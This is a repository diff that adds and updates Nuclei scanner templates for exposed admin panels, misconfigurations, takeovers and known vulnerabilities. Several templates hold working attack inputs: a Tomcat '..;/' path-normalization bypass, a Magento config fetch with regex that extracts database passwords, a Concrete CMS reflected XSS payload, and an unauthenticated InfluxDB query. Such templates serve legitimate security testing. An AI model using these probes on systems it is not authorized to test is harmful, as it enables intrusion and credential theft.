    9 9   - https://cwiki.apache.org/confluence/display/OFBIZ/Apache+OFBiz+Technical+Production+Setup+Guide
    skipped 31 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/adobe/aem-crx-package-manager.yaml
     1 +id: aem-crx-package-manager
     2 + 
     3 +info:
     4 + name: Adobe AEM CRX Package Manager Exposure
     5 + author: dhiyaneshDk
     6 + severity: info
     7 + reference:
     8 + - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
     9 + metadata:
     10 + shodan-query:
     11 + - http.title:"AEM Sign In"
     12 + - http.component:"Adobe Experience Manager"
     13 + tags: panel,aem,adobe
     14 + 
     15 +requests:
     16 + - method: GET
     17 + path:
     18 + - "{{BaseURL}}/crx/packmgr/index.jsp"
     19 + 
     20 + matchers-condition: and
     21 + matchers:
     22 + - type: word
     23 + words:
     24 + - '<title>CRX Package Manager</title>'
     25 + 
     26 + - type: word
     27 + part: header
     28 + words:
     29 + - text/html
     30 + 
     31 + - type: status
     32 + status:
     33 + - 200
     34 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/adobe/aem-sling-login.yaml
     1 +id: aem-sling-login
     2 + 
     3 +info:
     4 + name: AEM Sling Login
     5 + author: dhiyaneshDk
     6 + severity: info
     7 + reference:
     8 + - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
     9 + metadata:
     10 + shodan-query:
     11 + - http.title:"AEM Sign In"
     12 + - http.component:"Adobe Experience Manager"
     13 + tags: panel,aem,adobe,sling
     14 + 
     15 +requests:
     16 + - method: GET
     17 + path:
     18 + - "{{BaseURL}}/system/sling/cqform/defaultlogin.html"
     19 + 
     20 + matchers-condition: and
     21 + matchers:
     22 + - type: word
     23 + words:
     24 + - '<title>Login</title>'
     25 + - 'j_username'
     26 + - 'j_password'
     27 + condition: and
     28 + 
     29 + - type: word
     30 + part: header
     31 + words:
     32 + - text/html
     33 + 
     34 + - type: status
     35 + status:
     36 + - 200
     37 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/airflow-panel.yaml
    skipped 7 lines
    8 8   reference:
    9 9   - https://airflow.apache.org/docs/apache-airflow/stable/security/webserver.html
    10 10   classification:
    11  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    12  - cvss-score: 8.3
    13  - cwe-id: CWE-522
     11 + cvss-score: 0.0
     12 + cwe-id: CWE-668
    14 13   metadata:
    15 14   shodan-query: title:"Sign In - Airflow"
    16 15   tags: panel,apache,airflow,admin
    skipped 22 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/ambari-exposure.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: Apache Ambari Exposure Admin Login Panel
    5 5   author: pdteam
    6  - severity: medium
     6 + severity: info
    7 7   description: An Apache Ambari panel was discovered.
    8 8   classification:
    9  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    10  - cvss-score: 5.3
    11  - cwe-id: CWE-200
     9 + cvss-score: 0.0
     10 + cwe-id: CWE-668
    12 11   tags: panel,apache,ambari,exposure
    13 12   
    14 13  requests:
    skipped 13 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/apache/tomcat-pathnormalization.yaml
     1 +id: tomcat-manager-pathnormalization
     2 + 
     3 +info:
     4 + name: Tomcat Manager Path Normalization
     5 + author: organiccrap
     6 + severity: info
     7 + description: A Tomcat Manager login panel was discovered via path normalization. Normalizing a path involves modifying the string that identifies a path or file so that it conforms to a valid path on the target
     8 + operating system.
     9 + reference:
     10 + - https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/mitigation-path-normalization
     11 + - https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
     12 + classification:
     13 + cwe-id: CWE-200
     14 + tags: panel,tomcat,apache
     15 + 
     16 +requests:
     17 + - method: GET
     18 + path:
     19 + - '{{BaseURL}}/..;/manager/html'
     20 + - '{{BaseURL}}/..;/host-manager/html'
     21 + 
     22 + matchers-condition: and
     23 + matchers:
     24 + - type: word
     25 + words:
     26 + - 'username="tomcat" password="s3cret"'
     27 + - 'manager-gui'
     28 + condition: and
     29 + 
     30 + - type: status
     31 + negative: true
     32 + status:
     33 + - 403
     34 + - 401
     35 + 
     36 +# Enhanced by mp on 2022/03/17
     37 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/avantfax-panel.yaml
    skipped 7 lines
    8 8   reference:
    9 9   - http://www.avantfax.com/
    10 10   classification:
    11  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    12  - cvss-score: 5.3
    13  - cwe-id: CWE-200
     11 + cvss-score: 0.0
     12 + cwe-id: CWE-668
    14 13   metadata:
    15 14   shodan-query: http.title:"AvantFAX - Login"
    16 15   tags: panel,avantfax,login
    skipped 26 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/codemeter-webadmin-panel.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: CodeMeter - WebAdmin Panel Access
    5 5   author: Techryptic (@Tech)
    6  - severity: high
     6 + severity: info
    7 7   description: CodeMeter WebAdmin panel was accessed.
    8 8   classification:
    9  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    10  - cvss-score: 5.3
    11  - cwe-id: CWE-200
     9 + cvss-score: 0.0
     10 + cwe-id: CWE-668
    12 11   tags: codemeter,webadmin,panel
    13 12   
    14 13  requests:
    skipped 18 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/epson-access-detect.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: Epson Device Unauthorized Access Detect
    5 5   author: pussycat0x
    6  - severity: medium
     6 + severity: info
    7 7   description: A publicly available Epson device panel (printer, scanner, etc.) was detected.
    8 8   reference:
    9 9   - https://www.exploit-db.com/ghdb/6922
    10 10   classification:
    11  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
    12  - cvss-score: 5.8
    13  - cwe-id: CWE-522
     11 + cvss-score: 0.0
     12 + cwe-id: CWE-668
    14 13   tags: iot,printer,panel,unauth,epson,edb
    15  - 
    16 14  requests:
    17 15   - method: GET
    18 16   path:
    skipped 23 lines
  • ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/nagvis-panel.yaml
    skipped 22 lines
    23 23   - type: word
    24 24   part: body
    25 25   words:
    26  - - "/nagvis/frontend"
     26 + - "/nagvis/userfiles"
    27 27   - "<title>NagVis"
    28 28   condition: or
    29 29   
    skipped 4 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/open-virtualization-manager-panel.yaml
    skipped 3 lines
    4 4   name: Open Virtualization Userportal & Webadmin Panel Detection
    5 5   author: idealphase
    6 6   severity: info
    7  - description: Open Virtualization Userportal & Webadmin panels were detected. Open Virtualization Manager is an open-source distributed virtualization solution designed to manage enterprise infrastructure. oVirt
    8  - uses the trusted KVM hypervisor and is built upon several other community projects, including libvirt, Gluster, PatternFly, and Ansible.
     7 + description: Open Virtualization Userportal & Webadmin panels were detected. Open Virtualization Manager is an open-source distributed virtualization solution designed to manage enterprise infrastructure. oVirt uses the trusted KVM hypervisor and is built upon several other community projects, including libvirt, Gluster, PatternFly, and Ansible.
    9 8   reference:
    10 9   - https://www.ovirt.org/
    11 10   - https://www.ovirt.org/dropped/admin-guide/virt/console-client-resources.html
    12 11   classification:
    13  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    14  - cvss-score: 5.3
    15  - cwe-id: CWE-200
     12 + cvss-score: 0.0
     13 + cwe-id: CWE-668
    16 14   metadata:
    17 15   shodan-query: title:"Ovirt-Engine"
    18 16   google-query: intitle:"Ovirt-Engine"
    skipped 28 lines
  • ■ ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/qnap/qnap-qts-panel.yaml
    skipped 11 lines
    12 12   verified: true
    13 13   shodan-query: product:"QNAP"
    14 14   classification:
    15  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
    16 15   cvss-score: 0.0
    17 16   cwe-id: CWE-200
    18 17   tags: panel,qnap,qts
    skipped 19 lines
  • ■ ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/sicom-panel.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: Sicom MGRNG - Administrative Login Found
    5 5   author: sullo
    6  - severity: low
     6 + severity: info
    7 7   description: |
    8 8   Sicom MGRNG administrative login page found.
    9 9   classification:
    10  - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
    11  - cvss-score: 3.7
     10 + cvss-score: 0.0
    12 11   cwe-id: CWE-668
    13 12   tags: sicom,mgrng,panel
    14 13   
    skipped 17 lines
  • ■ ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/tenda-11n-wireless-router-login.yaml
    skipped 11 lines
    12 12   shodan-query: http.title:"Tenda 11N Wireless Router Login Screen"
    13 13   google-query: intitle:"Tenda 11N Wireless Router Login Screen"
    14 14   classification:
    15  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
    16 15   cvss-score: 0.0
    17  - cwe-id: CWE-419
     16 + cwe-id: CWE-668
    18 17   tags: panel,tenda
    19 18   
    20 19  requests:
    skipped 17 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposures/configs/magento-config.yaml
     1 +id: magento-config
     2 + 
     3 +info:
     4 + name: Magento Config Disclosure
     5 + author: geeknik
     6 + severity: medium
     7 + metadata:
     8 + shodan-query: http.component:"Magento"
     9 + tags: config,exposure,magento
     10 + 
     11 +requests:
     12 + - method: GET
     13 + path:
     14 + - "{{BaseURL}}/app/etc/local.xml"
     15 + - "{{BaseURL}}/store/app/etc/local.xml"
     16 + 
     17 + matchers-condition: and
     18 + matchers:
     19 + - type: status
     20 + status:
     21 + - 200
     22 + 
     23 + - type: word
     24 + words:
     25 + - "text/xml"
     26 + part: header
     27 + 
     28 + - type: word
     29 + words:
     30 + - "Magento"
     31 + part: body
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposures/configs/magento-information-disclosure.yaml
     1 +id: magento-information-disclosure
     2 + 
     3 +info:
     4 + name: Magento - Information Disclosure
     5 + author: ptonewreckin,danigoland
     6 + severity: high
     7 + description: |
     8 + Misconfigured instances of Magento may disclose usernames, passwords, and database configurations via /app/etc/local.xml
     9 + reference:
     10 + - https://github.com/ptonewreckin/cmsDetector/blob/master/signatures/magento.py
     11 + metadata:
     12 + verified: true
     13 + tags: magento,exposure,credential,config
     14 + 
     15 +requests:
     16 + - method: GET
     17 + path:
     18 + - "{{BaseURL}}/app/etc/local.xml"
     19 + - "{{BaseURL}}/app/etc/local.xml.additional"
     20 + - "{{BaseURL}}/store/app/etc/local.xml"
     21 + 
     22 + stop-at-first-match: true
     23 + matchers-condition: and
     24 + matchers:
     25 + - type: word
     26 + part: body
     27 + words:
     28 + - "* Magento"
     29 + - "<dbname>"
     30 + condition: and
     31 + 
     32 + - type: word
     33 + part: header
     34 + words:
     35 + - "application/xml"
     36 + 
     37 + - type: status
     38 + status:
     39 + - 200
     40 + 
     41 + extractors:
     42 + - type: regex
     43 + part: body
     44 + group: 1
     45 + regex:
     46 + - "<host><!\\[CDATA\\[(.+)\\]\\]><\\/host>"
     47 + - "<username><!\\[CDATA\\[(.+)\\]\\]><\\/username>"
     48 + - "<password><!\\[CDATA\\[(.+)\\]\\]><\\/password>"
     49 + - "<dbname><!\\[CDATA\\[(.+)\\]\\]><\\/dbname>"
     50 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/headless/extract-urls.yaml
    skipped 10 lines
    11 11   - args:
    12 12   url: "{{BaseURL}}"
    13 13   action: navigate
     14 + 
    14 15   - action: waitload
     16 + 
    15 17   - action: script
    16 18   name: extract
    17 19   args:
    skipped 1 lines
    19 21   () => {
    20 22   return '\n' + [...new Set(Array.from(document.querySelectorAll('[src], [href], [url], [action]')).map(i => i.src || i.href || i.url || i.action))].join('\r\n') + '\n'
    21 23   }
     24 + 
    22 25   extractors:
    23 26   - type: kval
    24 27   part: extract
    skipped 3 lines
  • ■ ■ ■ ■ ■
    config/nuclei-templates/headless/postmessage-outgoing-tracker.yaml
    skipped 14 lines
    15 15   part: response
    16 16   key: Content-Security-Policy
    17 17   value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;"
     18 + 
    18 19   - action: script
    19 20   args:
    20 21   hook: true
    skipped 24 lines
    45 46   }
    46 47   };
    47 48   }
     49 + 
    48 50   - args:
    49 51   url: "{{BaseURL}}"
    50 52   action: navigate
    51 53   - action: waitload
     54 + 
    52 55   - action: script
    53 56   name: alerts
    54 57   args:
    55  - code: window.alerts
     58 + code: |
     59 + () => { window.alerts }
     60 + 
    56 61   matchers:
    57 62   - type: word
    58 63   part: alerts
    59 64   words:
    60 65   - "at window.postMessage"
     66 + 
    61 67   extractors:
    62 68   - type: kval
    63 69   part: alerts
    skipped 2 lines
  • ■ ■ ■ ■ ■
    config/nuclei-templates/headless/postmessage-tracker.yaml
    skipped 14 lines
    15 15   part: response
    16 16   key: Content-Security-Policy
    17 17   value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;"
     18 + 
    18 19   - action: script
    19 20   args:
    20 21   hook: true
    skipped 24 lines
    45 46   return oldListener.apply(this, arguments);
    46 47   };
    47 48   }
     49 + 
    48 50   - args:
    49 51   url: "{{BaseURL}}"
    50 52   action: navigate
    51 53   - action: waitload
     54 + 
    52 55   - action: script
    53 56   name: alerts
    54 57   args:
    55  - code: window.alerts
     58 + code: |
     59 + () => { window.alerts }
     60 + 
    56 61   matchers:
    57 62   - type: word
    58 63   part: alerts
    59 64   words:
    60 65   - "at Window.addEventListener"
     66 + 
    61 67   extractors:
    62 68   - type: kval
    63 69   part: alerts
    skipped 3 lines
  • ■ ■ ■ ■ ■
    config/nuclei-templates/headless/prototype-pollution-check.yaml
    skipped 80 lines
    81 81   url: "{{BaseURL}}"
    82 82   action: navigate
    83 83   - action: waitload
     84 + 
    84 85   - action: script
    85 86   name: alerts
    86 87   args:
    87  - code: window.alerts
     88 + code: |
     89 + () => { window.alerts }
     90 + 
    88 91   matchers:
    89 92   - type: word
    90 93   part: alerts
    91 94   words:
    92 95   - "__proto__"
     96 + 
    93 97   extractors:
    94 98   - type: kval
    95 99   part: alerts
    skipped 3 lines
  • ■ ■ ■ ■ ■
    config/nuclei-templates/headless/window-name-domxss.yaml
    skipped 14 lines
    15 15   part: response
    16 16   key: Content-Security-Policy
    17 17   value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;"
     18 + 
    18 19   - action: script
    19 20   args:
    20 21   hook: true
    skipped 42 lines
    63 64   return oldEval.apply(this, arguments);
    64 65   };
    65 66   }
     67 + 
    66 68   - args:
    67 69   url: "{{BaseURL}}"
    68 70   action: navigate
    69 71   - action: waitload
     72 + 
    70 73   - action: script
    71 74   name: alerts
    72 75   args:
    73  - code: window.alerts
     76 + code: |
     77 + () => { window.alerts }
     78 + 
    74 79   matchers:
    75 80   - type: word
    76 81   part: alerts
    77 82   words:
    78 83   - "sink:"
     84 + 
    79 85   extractors:
    80 86   - type: kval
    81 87   part: alerts
    skipped 3 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/misconfiguration/aem/aem-crx-browser.yaml
     1 +id: aem-crx-browser
     2 + 
     3 +info:
     4 + name: Adobe AEM CRX Browser Exposure
     5 + author: dhiyaneshDk
     6 + severity: unknown
     7 + reference:
     8 + - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
     9 + metadata:
     10 + shodan-query:
     11 + - http.title:"AEM Sign In"
     12 + - http.component:"Adobe Experience Manager"
     13 + tags: misconfig,aem,adobe,exposure
     14 + 
     15 +requests:
     16 + - method: GET
     17 + path:
     18 + - "{{BaseURL}}/crx/explorer/browser/index.jsp"
     19 + 
     20 + matchers-condition: and
     21 + matchers:
     22 + - type: word
     23 + words:
     24 + - '<title>Content Explorer - UserID: anonymous | Workspace: crx.default</title>'
     25 + 
     26 + - type: word
     27 + part: header
     28 + words:
     29 + - text/html
     30 + 
     31 + - type: status
     32 + status:
     33 + - 200
     34 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/misconfiguration/aem/aem-crx-namespace.yaml
     1 +id: aem-crx-namespace
     2 + 
     3 +info:
     4 + name: Adobe AEM CRX Namespace Editor Exposure
     5 + author: dhiyaneshDk
     6 + severity: low
     7 + reference:
     8 + - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
     9 + metadata:
     10 + shodan-query:
     11 + - http.title:"AEM Sign In"
     12 + - http.component:"Adobe Experience Manager"
     13 + tags: exposure,aem,adobe
     14 + 
     15 +requests:
     16 + - method: GET
     17 + path:
     18 + - "{{BaseURL}}/crx/explorer/ui/namespace_editor.jsp"
     19 + 
     20 + matchers-condition: and
     21 + matchers:
     22 + - type: word
     23 + words:
     24 + - '<title>Namespaces</title>'
     25 + - 'The following namespaces are registered in the repository:'
     26 + condition: and
     27 + 
     28 + - type: word
     29 + part: header
     30 + words:
     31 + - text/html
     32 + 
     33 + - type: status
     34 + status:
     35 + - 200
     36 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/misconfiguration/aem/aem-crx-search.yaml
     1 +id: aem-crx-search
     2 + 
     3 +info:
     4 + name: Adobe AEM CRX Search Exposed
     5 + author: dhiyaneshDk
     6 + severity: unknown
     7 + reference:
     8 + - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
     9 + metadata:
     10 + shodan-query:
     11 + - http.title:"AEM Sign In"
     12 + - http.component:"Adobe Experience Manager"
     13 + tags: misconfig,aem,adobe,exposure
     14 + 
     15 +requests:
     16 + - method: GET
     17 + path:
     18 + - "{{BaseURL}}/crx/explorer/ui/search.jsp"
     19 + - "{{BaseURL}}/crx/explorer/ui/search.jsp?Path=&amp;Query="
     20 + - "{{BaseURL}}/crx/explorer/ui/search.jsp?Path=&Query="
     21 + 
     22 + stop-at-first-match: true
     23 + matchers-condition: and
     24 + matchers:
     25 + - type: word
     26 + words:
     27 + - '<title>Search</title>'
     28 + - '"/crx/explorer/ui/";'
     29 + condition: and
     30 + 
     31 + - type: word
     32 + part: header
     33 + words:
     34 + - text/html
     35 + 
     36 + - type: status
     37 + status:
     38 + - 200
     39 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/misconfiguration/aem/aem-disk-usage.yaml
     1 +id: aem-disk-usage
     2 + 
     3 +info:
     4 + name: Adobe AEM Disk Usage Information Disclosure
     5 + author: dhiyaneshDk
     6 + severity: low
     7 + reference:
     8 + - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
     9 + metadata:
     10 + shodan-query:
     11 + - http.title:"AEM Sign In"
     12 + - http.component:"Adobe Experience Manager"
     13 + tags: misconfig,aem,adobe,exposure
     14 + 
     15 +requests:
     16 + - method: GET
     17 + path:
     18 + - "{{BaseURL}}/etc/reports/diskusage.html"
     19 + - "{{BaseURL}}/etc/reports/diskusage.html?path=/content/dam"
     20 + 
     21 + stop-at-first-match: true
     22 + matchers-condition: and
     23 + matchers:
     24 + - type: word
     25 + words:
     26 + - 'Disk Usage /'
     27 + - '<th>nodes</th>'
     28 + condition: and
     29 + 
     30 + - type: word
     31 + part: header
     32 + words:
     33 + - text/html
     34 + 
     35 + - type: status
     36 + status:
     37 + - 200
     38 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/misconfiguration/aem/aem-explorer-nodetypes.yaml
     1 +id: aem-explorer-nodetypes
     2 + 
     3 +info:
     4 + name: Adobe AEM Explorer NodeTypes Exposure
     5 + author: dhiyaneshDk
     6 + severity: high
     7 + reference:
     8 + - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
     9 + metadata:
     10 + shodan-query:
     11 + - http.title:"AEM Sign In"
     12 + - http.component:"Adobe Experience Manager"
     13 + tags: misconfig,aem,adobe,exposure
     14 + 
     15 +requests:
     16 + - method: GET
     17 + path:
     18 + - "{{BaseURL}}/crx/explorer/nodetypes/index.jsp"
     19 + 
     20 + matchers-condition: and
     21 + matchers:
     22 + - type: word
     23 + words:
     24 + - 'nodetypeadmin'
     25 + - 'Registered Node Types'
     26 + condition: and
     27 + 
     28 + - type: word
     29 + part: header
     30 + words:
     31 + - text/html
     32 + 
     33 + - type: status
     34 + status:
     35 + - 200
     36 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/misconfiguration/aem/aem-misc-admin.yaml
     1 +id: aem-misc-admin
     2 + 
     3 +info:
     4 + name: Adobe AEM Misc Admin Dashboard Exposure
     5 + author: dhiyaneshDk
     6 + severity: high
     7 + reference:
     8 + - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
     9 + metadata:
     10 + verified: true
     11 + shodan-query:
     12 + - http.title:"AEM Sign In"
     13 + - http.component:"Adobe Experience Manager"
     14 + tags: misconfig,aem,adobe,exposure
     15 + 
     16 +requests:
     17 + - method: GET
     18 + path:
     19 + - "{{BaseURL}}/miscadmin"
     20 + - "{{BaseURL}}/mcmadmin#/content/dashboard"
     21 + - "{{BaseURL}}/miscadmin#/etc/mobile"
     22 + - "{{BaseURL}}/miscadmin#/etc/segmentation"
     23 + - "{{BaseURL}}/miscadmin#/etc/blueprints"
     24 + - "{{BaseURL}}/miscadmin#/etc/designs"
     25 + - "{{BaseURL}}/miscadmin#/etc/importers"
     26 + - "{{BaseURL}}/miscadmin#/etc/reports"
     27 + - "{{BaseURL}}/miscadmin#/etc/msm/rolloutconfigs"
     28 + 
     29 + stop-at-first-match: true
     30 + matchers-condition: and
     31 + matchers:
     32 + - type: word
     33 + part: body
     34 + words:
     35 + - '<title>AEM Tools</title>'
     36 + - '<title>AEM MCM</title>'
     37 + condition: or
     38 + 
     39 + - type: word
     40 + part: header
     41 + words:
     42 + - text/html
     43 + 
     44 + - type: status
     45 + status:
     46 + - 200
     47 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/misconfiguration/aem/aem-offloading-browser.yaml
     1 +id: aem-offloading-browser
     2 + 
     3 +info:
     4 + name: Adobe AEM Offloading Browser
     5 + author: dhiyaneshDk
     6 + severity: medium
     7 + reference:
     8 + - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
     9 + metadata:
     10 + shodan-query:
     11 + - http.title:"AEM Sign In"
     12 + - http.component:"Adobe Experience Manager"
     13 + tags: misconfig,aem,adobe
     14 + 
     15 +requests:
     16 + - method: GET
     17 + path:
     18 + - "{{BaseURL}}/libs/granite/offloading/content/view.html"
     19 + 
     20 + matchers-condition: and
     21 + matchers:
     22 + - type: word
     23 + words:
     24 + - 'Offloading Browser'
     25 + - '>CLUSTER</th>'
     26 + condition: and
     27 + 
     28 + - type: word
     29 + part: header
     30 + words:
     31 + - text/html
     32 + 
     33 + - type: status
     34 + status:
     35 + - 200
     36 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/misconfiguration/aem/aem-security-users.yaml
     1 +id: aem-security-users
     2 + 
     3 +info:
     4 + name: Adobe AEM Security Users Exposure
     5 + author: dhiyaneshDk
     6 + severity: medium
     7 + reference:
     8 + - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
     9 + metadata:
     10 + shodan-query:
     11 + - http.title:"AEM Sign In"
     12 + - http.component:"Adobe Experience Manager"
     13 + tags: misconfig,aem,adobe,exposure
     14 + 
     15 +requests:
     16 + - method: GET
     17 + path:
     18 + - "{{BaseURL}}/libs/granite/security/content/useradmin.html"
     19 + 
     20 + matchers-condition: and
     21 + matchers:
     22 + - type: word
     23 + words:
     24 + - 'AEM Security | Users'
     25 + - 'trackingelement="create user"'
     26 + condition: and
     27 + 
     28 + - type: word
     29 + part: header
     30 + words:
     31 + - text/html
     32 + 
     33 + - type: status
     34 + status:
     35 + - 200
     36 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/misconfiguration/aem/aem-sling-userinfo.yaml
     1 +id: aem-sling-userinfo
     2 + 
     3 +info:
     4 + name: Adobe AEM Sling User Info Servlet Exposure
     5 + author: DhiyaneshDk
     6 + severity: info
     7 + reference:
     8 + - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
     9 + metadata:
     10 + shodan-query:
     11 + - http.title:"AEM Sign In"
     12 + - http.component:"Adobe Experience Manager"
     13 + tags: misconfig,aem,adobe,exposure
     14 + 
     15 +requests:
     16 + - method: GET
     17 + path:
     18 + - "{{BaseURL}}/system/sling/info.sessionInfo.json"
     19 + - "{{BaseURL}}/system/sling/info.sessionInfo.txt"
     20 + 
     21 + stop-at-first-match: true
     22 + matchers-condition: and
     23 + matchers:
     24 + - type: word
     25 + words:
     26 + - 'userID:'
     27 + 
     28 + - type: word
     29 + part: header
     30 + words:
     31 + - "text/plain"
     32 + 
     33 + - type: status
     34 + status:
     35 + - 200
     36 + 
  • ■ ■ ■ ■
    config/nuclei-templates/misconfiguration/teamcity/teamcity-guest-login-enabled.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: JetBrains TeamCity - Guest User Access Enabled
    5 5   author: Ph33r
    6  - severity: info
     6 + severity: high
    7 7   description: |
    8 8   TeamCity provides the ability to turn on the guest login allowing anonymous access to the TeamCity UI.
    9 9   reference:
    skipped 30 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/misconfiguration/unauthenticated-influxdb.yaml
     1 +id: unauthenticated-influxdb
     2 + 
     3 +info:
     4 + name: Unauthentication InfluxDB Detection
     5 + author: pussycat0x
     6 + severity: high
     7 + metadata:
     8 + shodan-dork: InfluxDB
     9 + tags: unauth,db,influxdb,misconfig
     10 + 
     11 +requests:
     12 + - method: GET
     13 + path:
     14 + - "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"
     15 +
     16 + matchers-condition: and
     17 + matchers:
     18 + - type: word
     19 + part: body
     20 + words:
     21 + - '"results":'
     22 + - '"name":"databases"'
     23 + condition: and
     24 +
     25 + - type: status
     26 + status:
     27 + - 200
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/takeovers/uservoice-takeover.yaml
     1 +id: uservoice-takeover
     2 + 
     3 +info:
     4 + name: Uservoice Takeover Detection
     5 + author: MiryangJung
     6 + severity: high
     7 + reference:
     8 + - https://github.com/EdOverflow/can-i-take-over-xyz
     9 + tags: takeover,uservoice
     10 + 
     11 +requests:
     12 + - method: GET
     13 + path:
     14 + - "{{BaseURL}}"
     15 + 
     16 + matchers:
     17 + - type: word
     18 + words:
     19 + - "This UserVoice subdomain is currently available!"
     20 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/tb.sh
     1 +myrsync ./ $HOME/MyWork/scan4all/config/nuclei-templates
     2 + 
     3 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/technologies/elfinder-detect.yaml
    skipped 5 lines
    6 6   description: An elFinder implementation was discovered.
    7 7   severity: info
    8 8   classification:
    9  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
    10 9   cvss-score: 0.0
    11 10   cwe-id: CWE-200
    12 11   tags: tech,elfinder
    skipped 22 lines
  • ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/ibm/ibm-infoprint-lfi.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Local File Inclusion
    5 5   author: harshbothra_
    6  - severity: medium
     6 + severity: high
    7 7   description: IBM InfoPrint 4247-Z03 Impact Matrix Printer is subject to local file inclusion.
    8 8   reference:
    9 9   - https://www.exploit-db.com/exploits/47835
    skipped 22 lines
  • ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Local File Inclusion
    5 5   author: gy741
    6  - severity: medium
     6 + severity: high
    7 7   description: Carel pCOWeb HVAC BACnet Gateway 2.1.0 is vulnerable to local file inclusion because of input passed through the 'file' GET parameter through the 'logdownload.cgi' Bash script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.
    8 8   reference:
    9 9   - https://www.zeroscience.mk/codes/carelpco_dir.txt
    skipped 19 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/other/concrete-xss.yaml
     1 +id: concrete-xss
     2 + 
     3 +info:
     4 + name: Unauthenticated reflected XSS in preview_as_user function
     5 + author: shifacyclewla,hackergautam
     6 + severity: medium
     7 + description: The Concrete CMS < 8.5.2 is vulnerable to Reflected XSS using cID parameter.
     8 + reference:
     9 + - https://hackerone.com/reports/643442
     10 + - https://github.com/concrete5/concrete5/pull/7999
     11 + - https://twitter.com/JacksonHHax/status/1389222207805661187
     12 + tags: concrete,xss,cms
     13 + 
     14 +requests:
     15 + - method: GET
     16 + path:
     17 + - '{{BaseURL}}/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><svg/onload=alert("{{randstr}}")>'
     18 + 
